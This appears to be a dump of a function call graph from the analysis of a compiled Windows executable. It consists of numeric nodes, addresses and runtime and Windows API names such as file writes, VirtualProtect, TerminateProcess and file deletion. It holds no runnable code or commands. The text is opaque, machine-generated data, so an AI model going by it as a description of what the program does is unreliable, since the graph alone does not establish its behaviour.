93732->93733 93734 30b0ac 93733->93734 93735 30b08d 93733->93735 93765 30b082 93733->93765 93738 30b105 93734->93738 93739 30b0e9 93734->93739 93737 307bda __dosmaperr 47 API calls 93735->93737 93736 30a70c _$I10_OUTPUT 6 API calls 93740 30b86b 93736->93740 93741 30b092 93737->93741 93743 30b11c 93738->93743 93747 30f82f __lseeki64_nolock 49 API calls 93738->93747 93742 307bda __dosmaperr 47 API calls 93739->93742 93740->93719 93744 307c0e __dosmaperr 47 API calls 93741->93744 93746 30b0ee 93742->93746 93745 313bf2 __stbuf 47 API calls 93743->93745 93748 30b099 93744->93748 93749 30b12a 93745->93749 93750 307c0e __dosmaperr 47 API calls 93746->93750 93747->93743 93751 306e10 ___crtsetenv 8 API calls 93748->93751 93752 30b44b 93749->93752 93757 307a0d __beginthread 47 API calls 93749->93757 93753 30b0f5 93750->93753 93751->93765 93754 30b463 93752->93754 93755 30b7b8 WriteFile 93752->93755 93756 306e10 ___crtsetenv 8 API calls 93753->93756 93758 30b55a 93754->93758 93767 30b479 93754->93767 93759 30b7e1 GetLastError 93755->93759 93764 30b410 93755->93764 93756->93765 93760 30b150 GetConsoleMode 93757->93760 93769 30b663 93758->93769 93772 30b565 93758->93772 93759->93764 93760->93752 93762 30b189 93760->93762 93761 30b81b 93763 307c0e __dosmaperr 47 API calls 93761->93763 93761->93765 93762->93752 93766 30b199 GetConsoleCP 93762->93766 93770 30b843 93763->93770 93764->93761 93764->93765 93771 30b7f7 93764->93771 93765->93736 93766->93764 93792 30b1c2 93766->93792 93767->93761 93768 30b4e9 WriteFile 93767->93768 93768->93759 93773 30b526 93768->93773 93769->93761 93774 30b6d8 WideCharToMultiByte 93769->93774 93775 307bda __dosmaperr 47 API calls 93770->93775 93776 30b812 93771->93776 93777 30b7fe 93771->93777 93772->93761 93778 30b5de WriteFile 93772->93778 93773->93764 93773->93767 93786 30b555 93773->93786 93774->93759 93789 30b71f 93774->93789 93775->93765 93780 307bed __dosmaperr 47 API calls 93776->93780 93779 307c0e __dosmaperr 47 API calls 93777->93779 
93778->93759 93781 30b62d 93778->93781 93783 30b803 93779->93783 93780->93765 93781->93764 93781->93772 93781->93786 93782 30b727 WriteFile 93784 30b77a GetLastError 93782->93784 93782->93789 93785 307bda __dosmaperr 47 API calls 93783->93785 93784->93789 93785->93765 93786->93764 93787 301688 __chsize_nolock 57 API calls 93787->93792 93788 315884 WriteConsoleW CreateFileW __chsize_nolock 93794 30b2f6 93788->93794 93789->93764 93789->93769 93789->93782 93789->93786 93790 3140f7 59 API calls __chsize_nolock 93790->93792 93791 30b28f WideCharToMultiByte 93791->93764 93793 30b2ca WriteFile 93791->93793 93792->93764 93792->93787 93792->93790 93792->93791 93792->93794 93793->93759 93793->93794 93794->93759 93794->93764 93794->93788 93794->93792 93795 30b321 WriteFile 93794->93795 93795->93759 93795->93794 93796->93704 93797->93717 93798->93720 93799->93719 93800->93717 93801->93707 93802->93711 93803->93717 93804->93670 93805->93672 93828 30aba4 93806->93828 93808 30eb00 93841 30ab1e 48 API calls __dosmaperr 93808->93841 93810 30eaaa 93810->93808 93811 30aba4 __chsize_nolock 47 API calls 93810->93811 93820 30eade 93810->93820 93813 30ead5 93811->93813 93812 30aba4 __chsize_nolock 47 API calls 93814 30eaea CloseHandle 93812->93814 93817 30aba4 __chsize_nolock 47 API calls 93813->93817 93814->93808 93818 30eaf6 GetLastError 93814->93818 93815 30eb2a 93815->93694 93816 30eb08 93816->93815 93842 307bed 47 API calls __dosmaperr 93816->93842 93817->93820 93818->93808 93820->93808 93820->93812 93821->93678 93822->93691 93823->93694 93824->93691 93825->93682 93826->93686 93827->93691 93829 30abc4 93828->93829 93830 30abaf 93828->93830 93832 307bda __dosmaperr 47 API calls 93829->93832 93836 30abe9 93829->93836 93831 307bda __dosmaperr 47 API calls 93830->93831 93833 30abb4 93831->93833 93834 30abf3 93832->93834 93835 307c0e __dosmaperr 47 API calls 93833->93835 93837 307c0e __dosmaperr 47 API calls 93834->93837 93838 30abbc 93835->93838 93836->93810 93839 30abfb 93837->93839 
93838->93810 93840 306e10 ___crtsetenv 8 API calls 93839->93840 93840->93838 93841->93816 93842->93815 93843->93271 93844->93282 93845->93282 93846->93281 93847->93295 93848->93297 93849->93294 93850->93302 93851->93305 93852->93322 93853->93320 93855 30f8a0 __ftell_nolock 93854->93855 93856 2e40b4 GetLongPathNameW 93855->93856 93857 2e6a63 48 API calls 93856->93857 93858 2e40dc 93857->93858 93859 2e49a0 93858->93859 93860 2ed7f7 48 API calls 93859->93860 93861 2e49b2 93860->93861 93862 2e660f 49 API calls 93861->93862 93863 2e49bd 93862->93863 93864 2e49c8 93863->93864 93868 352e35 93863->93868 93865 2e64cf 48 API calls 93864->93865 93867 2e49d4 93865->93867 93906 2e28a6 93867->93906 93870 352e4f 93868->93870 93912 2fd35e 60 API calls 93868->93912 93871 2e49e7 Mailbox 93871->93145 93873 2e41a9 136 API calls 93872->93873 93874 2e415e 93873->93874 93875 353489 93874->93875 93876 2e41a9 136 API calls 93874->93876 93877 32c396 122 API calls 93875->93877 93878 2e4172 93876->93878 93879 35349e 93877->93879 93878->93875 93880 2e417a 93878->93880 93881 3534a2 93879->93881 93882 3534bf 93879->93882 93884 2e4186 93880->93884 93885 3534aa 93880->93885 93886 2e4252 84 API calls 93881->93886 93883 2ff4ea 48 API calls 93882->93883 93905 353504 Mailbox 93883->93905 93913 2ec833 93884->93913 94015 326b49 87 API calls _wprintf 93885->94015 93886->93885 93890 3534b8 93890->93882 93891 3536b4 93892 301c9d _free 47 API calls 93891->93892 93893 3536bc 93892->93893 93894 2e4252 84 API calls 93893->93894 93899 3536c5 93894->93899 93898 301c9d _free 47 API calls 93898->93899 93899->93898 93900 2e4252 84 API calls 93899->93900 94019 3225b5 86 API calls 4 library calls 93899->94019 93900->93899 93902 2ece19 48 API calls 93902->93905 93905->93891 93905->93899 93905->93902 94001 2eba85 93905->94001 94009 2e4dd9 93905->94009 94016 322551 48 API calls ___crtGetEnvironmentStringsW 93905->94016 94017 322472 60 API calls 2 library calls 93905->94017 94018 329c12 48 API calls 93905->94018 93907 
2e28b8 93906->93907 93911 2e28d7 ___crtGetEnvironmentStringsW 93906->93911 93909 2ff4ea 48 API calls 93907->93909 93908 2ff4ea 48 API calls 93910 2e28ee 93908->93910 93909->93911 93910->93871 93911->93908 93912->93868 93914 2ec843 __ftell_nolock 93913->93914 93915 353095 93914->93915 93916 2ec860 93914->93916 94044 3225b5 86 API calls 4 library calls 93915->94044 94025 2e48ba 49 API calls 93916->94025 93919 2ec882 94026 2e4550 56 API calls 93919->94026 93920 3530a8 94045 3225b5 86 API calls 4 library calls 93920->94045 93922 2ec897 93922->93920 93924 2ec89f 93922->93924 93926 2ed7f7 48 API calls 93924->93926 93925 3530c4 93928 2ec90c 93925->93928 93927 2ec8ab 93926->93927 94027 2fe968 49 API calls __ftell_nolock 93927->94027 93930 3530d7 93928->93930 93931 2ec91a 93928->93931 93934 2e4907 CloseHandle 93930->93934 94030 301dfc 93931->94030 93932 2ec8b7 93935 2ed7f7 48 API calls 93932->93935 93936 3530e3 93934->93936 93937 2ec8c3 93935->93937 93938 2e41a9 136 API calls 93936->93938 93939 2e660f 49 API calls 93937->93939 93940 35310d 93938->93940 93941 2ec8d1 93939->93941 93943 353136 93940->93943 93947 32c396 122 API calls 93940->93947 94028 2feb66 SetFilePointerEx ReadFile 93941->94028 93942 2ec943 _wcscat _wcscpy 93946 2ec96d SetCurrentDirectoryW 93942->93946 94046 3225b5 86 API calls 4 library calls 93943->94046 93951 2ff4ea 48 API calls 93946->93951 93952 353129 93947->93952 93948 2ec8fd 94029 2e46ce SetFilePointerEx SetFilePointerEx 93948->94029 93950 35314d 93960 2ecad1 Mailbox 93950->93960 93953 2ec988 93951->93953 93954 353131 93952->93954 93955 353152 93952->93955 93957 2e47b7 48 API calls 93953->93957 93958 2e4252 84 API calls 93954->93958 93956 2e4252 84 API calls 93955->93956 93959 353157 93956->93959 93970 2ec993 Mailbox __NMSG_WRITE 93957->93970 93958->93943 93961 2ff4ea 48 API calls 93959->93961 94020 2e48dd 93960->94020 93968 353194 93961->93968 93962 2eca9d 94040 2e4907 93962->94040 93966 2e3d98 93966->93019 93966->93041 93967 2ecaa9 
SetCurrentDirectoryW 93967->93960 93971 2eba85 48 API calls 93968->93971 93970->93962 93983 35345f 93970->93983 93984 2ece19 48 API calls 93970->93984 93987 353467 93970->93987 94033 2eb337 56 API calls _wcscpy 93970->94033 94034 2fc258 GetStringTypeW 93970->94034 94035 2ecb93 59 API calls __wcsnicmp 93970->94035 94036 2ecb5a GetStringTypeW __NMSG_WRITE 93970->94036 94037 3016d0 GetStringTypeW __wtof_l 93970->94037 94038 2ecc24 162 API calls 3 library calls 93970->94038 94039 2fc682 48 API calls 93970->94039 93996 3531dd Mailbox 93971->93996 93973 3533ce 94051 329b72 48 API calls 93973->94051 93977 353480 93977->93962 93978 3533f0 94052 3429e8 48 API calls ___crtGetEnvironmentStringsW 93978->94052 93980 3533fd 93981 301c9d _free 47 API calls 93980->93981 93981->93960 94054 32240b 48 API calls 3 library calls 93983->94054 93984->93970 93986 2eba85 48 API calls 93986->93996 94055 3225b5 86 API calls 4 library calls 93987->94055 93992 2ece19 48 API calls 93992->93996 93995 353420 94053 3225b5 86 API calls 4 library calls 93995->94053 93996->93973 93996->93986 93996->93992 93996->93995 94047 322551 48 API calls ___crtGetEnvironmentStringsW 93996->94047 94048 322472 60 API calls 2 library calls 93996->94048 94049 329c12 48 API calls 93996->94049 94050 2fc682 48 API calls 93996->94050 93998 353439 93999 301c9d _free 47 API calls 93998->93999 94000 35344c 93999->94000 94000->93960 94002 2ebb25 94001->94002 94006 2eba98 ___crtGetEnvironmentStringsW 94001->94006 94004 2ff4ea 48 API calls 94002->94004 94003 2ff4ea 48 API calls 94005 2eba9f 94003->94005 94004->94006 94007 2ff4ea 48 API calls 94005->94007 94008 2ebac8 94005->94008 94006->94003 94007->94008 94008->93905 94010 2e4dec 94009->94010 94013 2e4e9a 94009->94013 94011 2ff4ea 48 API calls 94010->94011 94014 2e4e1e 94010->94014 94011->94014 94012 2ff4ea 48 API calls 94012->94014 94013->93905 94014->94012 94014->94013 94015->93890 94016->93905 94017->93905 94018->93905 94019->93899 94021 2e4907 CloseHandle 94020->94021 
94022 2e48e5 Mailbox 94021->94022 94023 2e4907 CloseHandle 94022->94023 94024 2e48fc 94023->94024 94024->93966 94025->93919 94026->93922 94027->93932 94028->93948 94029->93928 94056 301e46 94030->94056 94033->93970 94034->93970 94035->93970 94036->93970 94037->93970 94038->93970 94039->93970 94041 2e4920 94040->94041 94042 2e4911 94040->94042 94041->94042 94043 2e4925 CloseHandle 94041->94043 94042->93967 94043->94042 94044->93920 94045->93925 94046->93950 94047->93996 94048->93996 94049->93996 94050->93996 94051->93978 94052->93980 94053->93998 94054->93987 94055->93977 94057 301e61 94056->94057 94060 301e55 94056->94060 94080 307c0e 47 API calls __getptd_noexit 94057->94080 94059 302019 94064 301e41 94059->94064 94081 306e10 8 API calls ___crtsetenv 94059->94081 94060->94057 94071 301ed4 94060->94071 94075 309d6b 47 API calls 2 library calls 94060->94075 94063 301fa0 94063->94057 94063->94064 94066 301fb0 94063->94066 94064->93942 94065 301f5f 94065->94057 94067 301f7b 94065->94067 94077 309d6b 47 API calls 2 library calls 94065->94077 94079 309d6b 47 API calls 2 library calls 94066->94079 94067->94057 94067->94064 94070 301f91 94067->94070 94078 309d6b 47 API calls 2 library calls 94070->94078 94071->94057 94074 301f41 94071->94074 94076 309d6b 47 API calls 2 library calls 94071->94076 94074->94063 94074->94065 94075->94071 94076->94074 94077->94067 94078->94064 94079->94064 94080->94059 94081->94064 94083 2e4c8b 94082->94083 94088 2e4d94 94082->94088 94084 2ff4ea 48 API calls 94083->94084 94083->94088 94085 2e4cb2 94084->94085 94086 2ff4ea 48 API calls 94085->94086 94092 2e4d22 94086->94092 94088->93151 94090 2e4dd9 48 API calls 94090->94092 94091 2eba85 48 API calls 94091->94092 94092->94088 94092->94090 94092->94091 94095 2eb470 91 API calls 2 library calls 94092->94095 94096 329af1 48 API calls 94092->94096 94093->93153 94094->93155 94095->94092 94096->94092 94098 2e403c LoadImageW 94097->94098 94099 35418d EnumResourceNamesW 94097->94099 94100 2e3ee1 
RegisterClassExW 94098->94100 94099->94100 94101 2e3f53 7 API calls 94100->94101 94101->93170 94103 2ef130 94102->94103 94110 2ef199 94103->94110 94212 2efe30 346 API calls __cinit 94103->94212 94104 2ef595 94113 2ed7f7 48 API calls 94104->94113 94134 2ef431 Mailbox 94104->94134 94106 3587c8 94216 32cc5c 86 API calls 4 library calls 94106->94216 94107 358728 94107->94110 94213 32cc5c 86 API calls 4 library calls 94107->94213 94108 2ef418 94120 358b1b 94108->94120 94108->94134 94135 2ef6aa 94108->94135 94110->94104 94114 2ed7f7 48 API calls 94110->94114 94142 2ef229 94110->94142 94156 2ef3dd 94110->94156 94111 2efe30 346 API calls 94111->94134 94115 3587a3 94113->94115 94116 358772 94114->94116 94215 300f0a 52 API calls __cinit 94115->94215 94214 300f0a 52 API calls __cinit 94116->94214 94117 32cc5c 86 API calls 94117->94134 94119 2ef3f2 94119->94108 94217 329af1 48 API calls 94119->94217 94136 358b2c 94120->94136 94137 358bcf 94120->94137 94121 2ef770 94128 358a45 94121->94128 94149 2ef77a 94121->94149 94123 2ed6e9 55 API calls 94123->94134 94125 358c53 94232 32cc5c 86 API calls 4 library calls 94125->94232 94126 358810 94218 33eef8 346 API calls 94126->94218 94224 2fc1af 48 API calls 94128->94224 94129 358b7e 94227 33e40a 346 API calls Mailbox 94129->94227 94134->94111 94134->94117 94134->94123 94134->94125 94134->94129 94138 358beb 94134->94138 94144 2ef537 Mailbox 94134->94144 94147 2f1b90 48 API calls 94134->94147 94152 2efce0 94134->94152 94211 2edd47 48 API calls ___crtGetEnvironmentStringsW 94134->94211 94225 3197ed InterlockedDecrement 94134->94225 94233 2fc1af 48 API calls 94134->94233 94135->94121 94135->94134 94135->94144 94135->94152 94210 2efe30 346 API calls __cinit 94135->94210 94226 33f5ee 346 API calls 94136->94226 94229 32cc5c 86 API calls 4 library calls 94137->94229 94230 33bdbd 346 API calls Mailbox 94138->94230 94142->94104 94142->94108 94142->94134 94142->94156 94143 358823 94143->94108 94151 35884b 94143->94151 94144->93195 94146 2f1b90 48 
API calls 94146->94134 94147->94134 94148 358c00 94148->94144 94231 32cc5c 86 API calls 4 library calls 94148->94231 94149->94146 94219 33ccdc 48 API calls 94151->94219 94152->94144 94228 32cc5c 86 API calls 4 library calls 94152->94228 94156->94106 94156->94119 94156->94134 94157 358857 94159 358865 94157->94159 94160 3588aa 94157->94160 94220 329b72 48 API calls 94159->94220 94163 3588a0 Mailbox 94160->94163 94221 32a69d 48 API calls 94160->94221 94223 2efe30 346 API calls __cinit 94163->94223 94165 3588e7 94222 2ebc74 48 API calls 94165->94222 94168 2f479f 94167->94168 94169 2f4637 94167->94169 94172 2ece19 48 API calls 94168->94172 94170 356e05 94169->94170 94171 2f4643 94169->94171 94285 33e822 346 API calls Mailbox 94170->94285 94284 2f4300 346 API calls ___crtGetEnvironmentStringsW 94171->94284 94179 2f46e4 Mailbox 94172->94179 94175 356e11 94176 2f4739 Mailbox 94175->94176 94286 32cc5c 86 API calls 4 library calls 94175->94286 94176->93195 94178 2f4659 94178->94175 94178->94176 94178->94179 94182 2e4252 84 API calls 94179->94182 94234 340d1d 94179->94234 94237 340d09 94179->94237 94240 326524 94179->94240 94243 32fa0c 94179->94243 94182->94176 94186 35df42 94185->94186 94187 2fe253 94185->94187 94188 35df77 94186->94188 94189 35df59 TranslateAcceleratorW 94186->94189 94187->93195 94189->94187 94191 2fdca3 94190->94191 94192 2fdc71 94190->94192 94191->93195 94192->94191 94193 2fdc96 IsDialogMessageW 94192->94193 94194 35dd1d GetClassLongW 94192->94194 94193->94191 94193->94192 94194->94192 94194->94193 94195->93195 94196->93195 94197->93195 94198->93177 94199->93180 94200->93185 94201->93195 94202->93195 94203->93231 94204->93231 94205->93231 94206->93195 94207->93231 94208->93231 94209->93231 94210->94135 94211->94134 94212->94107 94213->94110 94214->94142 94215->94134 94216->94144 94217->94126 94218->94143 94219->94157 94220->94163 94221->94165 94222->94163 94223->94144 94224->94134 94225->94134 94226->94134 94227->94152 94228->94144 94229->94144 
94230->94148 94231->94144 94232->94144 94233->94134 94287 33f8ae 94234->94287 94236 340d2d 94236->94176 94238 33f8ae 129 API calls 94237->94238 94239 340d19 94238->94239 94239->94176 94373 326ca9 GetFileAttributesW 94240->94373 94244 32fa1c __ftell_nolock 94243->94244 94245 32fa44 94244->94245 94438 2ed286 48 API calls 94244->94438 94247 2e936c 81 API calls 94245->94247 94248 32fa5e 94247->94248 94249 32fa80 94248->94249 94250 32fb68 94248->94250 94260 32fb92 94248->94260 94251 2e936c 81 API calls 94249->94251 94252 2e41a9 136 API calls 94250->94252 94258 32fa8c _wcscpy _wcschr 94251->94258 94253 32fb79 94252->94253 94254 32fb8e 94253->94254 94255 2e41a9 136 API calls 94253->94255 94256 2e936c 81 API calls 94254->94256 94254->94260 94255->94254 94257 32fbc7 94256->94257 94259 301dfc __wsplitpath 47 API calls 94257->94259 94263 32fab0 _wcscat _wcscpy 94258->94263 94266 32fade _wcscat 94258->94266 94268 32fbeb _wcscat _wcscpy 94259->94268 94260->94176 94261 2e936c 81 API calls 94262 32fafc _wcscpy 94261->94262 94439 3272cb GetFileAttributesW 94262->94439 94265 2e936c 81 API calls 94263->94265 94265->94266 94266->94261 94267 32fb1c __NMSG_WRITE 94267->94260 94269 2e936c 81 API calls 94267->94269 94272 2e936c 81 API calls 94268->94272 94270 32fb48 94269->94270 94440 3260dd 77 API calls 4 library calls 94270->94440 94274 32fc82 94272->94274 94273 32fb5c 94273->94260 94377 32690b 94274->94377 94276 32fca2 94277 326524 3 API calls 94276->94277 94278 32fcb1 94277->94278 94279 2e936c 81 API calls 94278->94279 94283 32fce2 94278->94283 94280 32fccb 94279->94280 94383 32bfa4 94280->94383 94282 2e4252 84 API calls 94282->94260 94283->94282 94284->94178 94285->94175 94286->94176 94288 2e936c 81 API calls 94287->94288 94289 33f8ea 94288->94289 94294 33f92c Mailbox 94289->94294 94323 340567 94289->94323 94291 33fb8b 94292 33fcfa 94291->94292 94299 33fb95 94291->94299 94359 340688 89 API calls Mailbox 94292->94359 94294->94236 94296 33fd07 94298 33fd13 94296->94298 94296->94299 
94297 33f984 Mailbox 94297->94291 94297->94294 94300 2e936c 81 API calls 94297->94300 94354 3429e8 48 API calls ___crtGetEnvironmentStringsW 94297->94354 94355 33fda5 60 API calls 2 library calls 94297->94355 94298->94294 94336 33f70a 94299->94336 94300->94297 94305 33fbc9 94350 2fed18 94305->94350 94308 33fbe3 94356 32cc5c 86 API calls 4 library calls 94308->94356 94309 33fbfd 94311 2fc050 48 API calls 94309->94311 94313 33fc14 94311->94313 94312 33fbee GetCurrentProcess TerminateProcess 94312->94309 94314 2f1b90 48 API calls 94313->94314 94322 33fc3e 94313->94322 94316 33fc2d 94314->94316 94315 33fd65 94315->94294 94319 33fd7e FreeLibrary 94315->94319 94357 34040f 105 API calls _free 94316->94357 94317 2f1b90 48 API calls 94317->94322 94319->94294 94322->94315 94322->94317 94358 2edcae 50 API calls Mailbox 94322->94358 94360 34040f 105 API calls _free 94322->94360 94324 2ebdfa 48 API calls 94323->94324 94325 340582 CharLowerBuffW 94324->94325 94361 321f11 94325->94361 94329 2ed7f7 48 API calls 94330 3405bb 94329->94330 94368 2e69e9 48 API calls ___crtGetEnvironmentStringsW 94330->94368 94332 34061a Mailbox 94332->94297 94333 3405d2 94334 2eb18b 48 API calls 94333->94334 94335 3405de Mailbox 94334->94335 94335->94332 94369 33fda5 60 API calls 2 library calls 94335->94369 94337 33f725 94336->94337 94338 33f77a 94336->94338 94339 2ff4ea 48 API calls 94337->94339 94342 340828 94338->94342 94341 33f747 94339->94341 94340 2ff4ea 48 API calls 94340->94341 94341->94338 94341->94340 94343 340a53 Mailbox 94342->94343 94346 34084b _strcat _wcscpy __NMSG_WRITE 94342->94346 94343->94305 94344 2ed286 48 API calls 94344->94346 94345 2ecf93 58 API calls 94345->94346 94346->94343 94346->94344 94346->94345 94347 2e936c 81 API calls 94346->94347 94348 30395c 47 API calls __crtGetStringTypeA_stat 94346->94348 94372 328035 50 API calls __NMSG_WRITE 94346->94372 94347->94346 94348->94346 94351 2fed2d 94350->94351 94352 2fedc5 VirtualProtect 94351->94352 94353 2fed93 94351->94353 
94352->94353 94353->94308 94353->94309 94354->94297 94355->94297 94356->94312 94357->94322 94358->94322 94359->94296 94360->94322 94362 321f3b __NMSG_WRITE 94361->94362 94363 321f79 94362->94363 94365 321f6f 94362->94365 94366 321ffa 94362->94366 94363->94329 94363->94335 94365->94363 94370 2fd37a 60 API calls 94365->94370 94366->94363 94371 2fd37a 60 API calls 94366->94371 94368->94333 94369->94332 94370->94365 94371->94366 94372->94346 94374 326529 94373->94374 94375 326cc4 FindFirstFileW 94373->94375 94374->94176 94375->94374 94376 326cd9 FindClose 94375->94376 94376->94374 94378 326918 _wcschr __ftell_nolock 94377->94378 94379 301dfc __wsplitpath 47 API calls 94378->94379 94382 32692e _wcscat _wcscpy 94378->94382 94380 32695d 94379->94380 94381 301dfc __wsplitpath 47 API calls 94380->94381 94381->94382 94382->94276 94384 32bfb1 __ftell_nolock 94383->94384 94385 2ff4ea 48 API calls 94384->94385 94386 32c00e 94385->94386 94387 2e47b7 48 API calls 94386->94387 94388 32c018 94387->94388 94389 32bdb4 GetSystemTimeAsFileTime 94388->94389 94390 32c023 94389->94390 94391 2e4517 83 API calls 94390->94391 94392 32c036 _wcscmp 94391->94392 94393 32c107 94392->94393 94394 32c05a 94392->94394 94395 32c56d 94 API calls 94393->94395 94396 32c56d 94 API calls 94394->94396 94411 32c0d3 _wcscat 94395->94411 94397 32c05f 94396->94397 94398 301dfc __wsplitpath 47 API calls 94397->94398 94400 32c110 94397->94400 94403 32c088 _wcscat _wcscpy 94398->94403 94399 2e44ed 64 API calls 94401 32c12c 94399->94401 94400->94283 94402 2e44ed 64 API calls 94401->94402 94404 32c13c 94402->94404 94406 301dfc __wsplitpath 47 API calls 94403->94406 94405 2e44ed 64 API calls 94404->94405 94407 32c157 94405->94407 94406->94411 94408 2e44ed 64 API calls 94407->94408 94409 32c167 94408->94409 94410 2e44ed 64 API calls 94409->94410 94412 32c182 94410->94412 94411->94399 94411->94400 94413 2e44ed 64 API calls 94412->94413 94414 32c192 94413->94414 94415 2e44ed 64 API calls 94414->94415 94416 32c1a2 
94415->94416 94417 2e44ed 64 API calls 94416->94417 94418 32c1b2 94417->94418 94441 32c71a GetTempPathW GetTempFileNameW 94418->94441 94420 32c1be 94421 303499 117 API calls 94420->94421 94431 32c1cf 94421->94431 94422 32c289 94423 3035e4 __fcloseall 83 API calls 94422->94423 94424 32c294 94423->94424 94426 32c29a DeleteFileW 94424->94426 94427 32c2ae 94424->94427 94425 2e44ed 64 API calls 94425->94431 94426->94400 94428 32c342 CopyFileW 94427->94428 94433 32c2b8 94427->94433 94429 32c36a DeleteFileW 94428->94429 94430 32c358 DeleteFileW 94428->94430 94455 32c6d9 CreateFileW 94429->94455 94430->94400 94431->94400 94431->94422 94431->94425 94442 302aae 94431->94442 94458 32b965 118 API calls __fcloseall 94433->94458 94436 32c32d 94436->94429 94437 32c331 DeleteFileW 94436->94437 94437->94400 94438->94245 94439->94267 94440->94273 94441->94420 94443 302aba type_info::_Type_info_dtor 94442->94443 94444 302ad4 94443->94444 94445 302aec 94443->94445 94446 302ae4 type_info::_Type_info_dtor 94443->94446 94471 307c0e 47 API calls __getptd_noexit 94444->94471 94447 304e1c __lock_file 48 API calls 94445->94447 94446->94431 94449 302af2 94447->94449 94459 302957 94449->94459 94450 302ad9 94472 306e10 8 API calls ___crtsetenv 94450->94472 94456 32c715 94455->94456 94457 32c6ff SetFileTime CloseHandle 94455->94457 94456->94400 94457->94456 94458->94436 94462 302966 94459->94462 94465 302984 94459->94465 94460 302974 94474 307c0e 47 API calls __getptd_noexit 94460->94474 94462->94460 94462->94465 94469 30299c ___crtGetEnvironmentStringsW 94462->94469 94463 302979 94475 306e10 8 API calls ___crtsetenv 94463->94475 94473 302b24 LeaveCriticalSection LeaveCriticalSection _fseek 94465->94473 94467 302c84 __flush 78 API calls 94467->94469 94468 302933 _fprintf 47 API calls 94468->94469 94469->94465 94469->94467 94469->94468 94470 30af61 __flswbuf 78 API calls 94469->94470 94476 308e63 78 API calls 6 library calls 94469->94476 94470->94469 94471->94450 94472->94446 94473->94446 
94474->94463 94475->94465 94476->94469 94477 35197b 94482 2fdd94 94477->94482 94481 35198a 94483 2ff4ea 48 API calls 94482->94483 94484 2fdd9c 94483->94484 94485 2fddb0 94484->94485 94490 2fdf3d 94484->94490 94489 300f0a 52 API calls __cinit 94485->94489 94489->94481 94491 2fdda8 94490->94491 94492 2fdf46 94490->94492 94494 2fddc0 94491->94494 94522 300f0a 52 API calls __cinit 94492->94522 94495 2ed7f7 48 API calls 94494->94495 94496 2fddd7 GetVersionExW 94495->94496 94497 2e6a63 48 API calls 94496->94497 94498 2fde1a 94497->94498 94523 2fdfb4 94498->94523 94501 2e6571 48 API calls 94503 2fde2e 94501->94503 94505 3524c8 94503->94505 94527 2fdf77 94503->94527 94506 2fdea4 GetCurrentProcess 94536 2fdf5f LoadLibraryA GetProcAddress 94506->94536 94508 2fdee3 94530 2fe00c 94508->94530 94509 2fdf31 GetSystemInfo 94511 2fdf0e 94509->94511 94510 2fdebb 94510->94508 94510->94509 94513 2fdf1c FreeLibrary 94511->94513 94514 2fdf21 94511->94514 94513->94514 94514->94485 94516 2fdf29 GetSystemInfo 94518 2fdf03 94516->94518 94517 2fdef9 94533 2fdff4 94517->94533 94518->94511 94520 2fdf09 FreeLibrary 94518->94520 94520->94511 94522->94491 94524 2fdfbd 94523->94524 94525 2eb18b 48 API calls 94524->94525 94526 2fde22 94525->94526 94526->94501 94537 2fdf89 94527->94537 94541 2fe01e 94530->94541 94534 2fe00c 2 API calls 94533->94534 94535 2fdf01 GetNativeSystemInfo 94534->94535 94535->94518 94536->94510 94538 2fdea0 94537->94538 94539 2fdf92 LoadLibraryA 94537->94539 94538->94506 94538->94510 94539->94538 94540 2fdfa3 GetProcAddress 94539->94540 94540->94538 94542 2fdef1 94541->94542 94543 2fe027 LoadLibraryA 94541->94543 94542->94516 94542->94517 94543->94542 94544 2fe038 GetProcAddress 94543->94544 94544->94542 94545 3519cb 94550 2e2322 94545->94550 94547 3519d1 94583 300f0a 52 API calls __cinit 94547->94583 94549 3519db 94551 2e2344 94550->94551 94584 2e26df 94551->94584 94556 2ed7f7 48 API calls 94557 2e2384 94556->94557 94558 2ed7f7 48 API calls 94557->94558 94559 2e238e 
94558->94559 94560 2ed7f7 48 API calls 94559->94560 94561 2e2398 94560->94561 94562 2ed7f7 48 API calls 94561->94562 94563 2e23de 94562->94563 94564 2ed7f7 48 API calls 94563->94564 94565 2e24c1 94564->94565 94592 2e263f 94565->94592 94569 2e24f1 94570 2ed7f7 48 API calls 94569->94570 94571 2e24fb 94570->94571 94621 2e2745 94571->94621 94573 2e2546 94574 2e2556 GetStdHandle 94573->94574 94575 35501d 94574->94575 94576 2e25b1 94574->94576 94575->94576 94578 355026 94575->94578 94577 2e25b7 CoInitialize 94576->94577 94577->94547 94628 3292d4 53 API calls 94578->94628 94580 35502d 94629 3299f9 CreateThread 94580->94629 94582 355039 CloseHandle 94582->94577 94583->94549 94630 2e2854 94584->94630 94587 2e6a63 48 API calls 94588 2e234a 94587->94588 94589 2e272e 94588->94589 94644 2e27ec 6 API calls 94589->94644 94591 2e237a 94591->94556 94593 2ed7f7 48 API calls 94592->94593 94594 2e264f 94593->94594 94595 2ed7f7 48 API calls 94594->94595 94596 2e2657 94595->94596 94645 2e26a7 94596->94645 94599 2e26a7 48 API calls 94600 2e2667 94599->94600 94601 2ed7f7 48 API calls 94600->94601 94602 2e2672 94601->94602 94603 2ff4ea 48 API calls 94602->94603 94604 2e24cb 94603->94604 94605 2e22a4 94604->94605 94606 2e22b2 94605->94606 94607 2ed7f7 48 API calls 94606->94607 94608 2e22bd 94607->94608 94609 2ed7f7 48 API calls 94608->94609 94610 2e22c8 94609->94610 94611 2ed7f7 48 API calls 94610->94611 94612 2e22d3 94611->94612 94613 2ed7f7 48 API calls 94612->94613 94614 2e22de 94613->94614 94615 2e26a7 48 API calls 94614->94615 94616 2e22e9 94615->94616 94617 2ff4ea 48 API calls 94616->94617 94618 2e22f0 94617->94618 94619 351fe7 94618->94619 94620 2e22f9 RegisterWindowMessageW 94618->94620 94620->94569 94622 355f4d 94621->94622 94623 2e2755 94621->94623 94650 32c942 50 API calls 94622->94650 94624 2ff4ea 48 API calls 94623->94624 94626 2e275d 94624->94626 94626->94573 94627 355f58 94628->94580 94629->94582 94651 3299df 54 API calls 94629->94651 94637 2e2870 94630->94637 94633 2e2870 48 
